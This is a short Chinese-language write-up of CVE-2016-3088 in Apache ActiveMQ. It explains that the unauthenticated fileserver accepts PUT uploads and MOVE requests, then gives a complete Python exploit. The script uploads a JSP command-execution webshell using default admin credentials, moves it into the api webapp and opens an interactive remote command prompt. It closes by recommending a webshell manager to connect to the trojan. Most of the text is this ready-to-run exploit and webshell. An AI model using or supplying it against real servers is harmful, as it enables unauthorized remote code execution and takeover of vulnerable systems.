CVE-2016-3088
1.描述
- Apache ActiveMQ 5.x ~ 5.14.0
- 一个任意文件上传漏洞
- 一个任意代码执行漏洞
- ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录
2.原理
-
put方法上传webshell
-
移动webshell到有执行权限的目录执行
3.EXP
- poc.py
import requests
url_put = "http://192.168.76.138:8161/fileserver/{}.jsp"
filename = str(input("Please enter put filename:"))
data = '''<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>
'''
hearders_put = {
"Authorization": "Basic YWRtaW46YWRtaW4="
}
res_put = requests.put(url=url_put.format(filename),data=data,headers=hearders_put)
if int(res_put.status_code) == 204:
url_move = "http://192.168.76.138:8161/fileserver/{}.jsp"
dst_file = "file:///opt/activemq/webapps/api/{}.jsp"
hearders_move = {
"Destination":dst_file.format(filename),
"Authorization": "Basic YWRtaW46YWRtaW4="
}
res_move = requests.request(method='MOVE',url=url_move.format(filename),headers=hearders_move,data=data)
if int(res_move.status_code == 204):
quit_input = True
while quit_input:
cmd = str(input("CVE-2016-3088 is exist!\nplease enter cmd:"))
if cmd in ['q','quit','exit']:
quit_input = False
continue
url_cmd = "http://192.168.76.138:8161/api/{}.jsp?cmd={}"
res_cmd = requests.get(url=url_cmd.format(filename,cmd),headers=hearders_put)
print(res_cmd.text)4.POC
- 中国蚁剑连接那个jsp木马可以获得shell
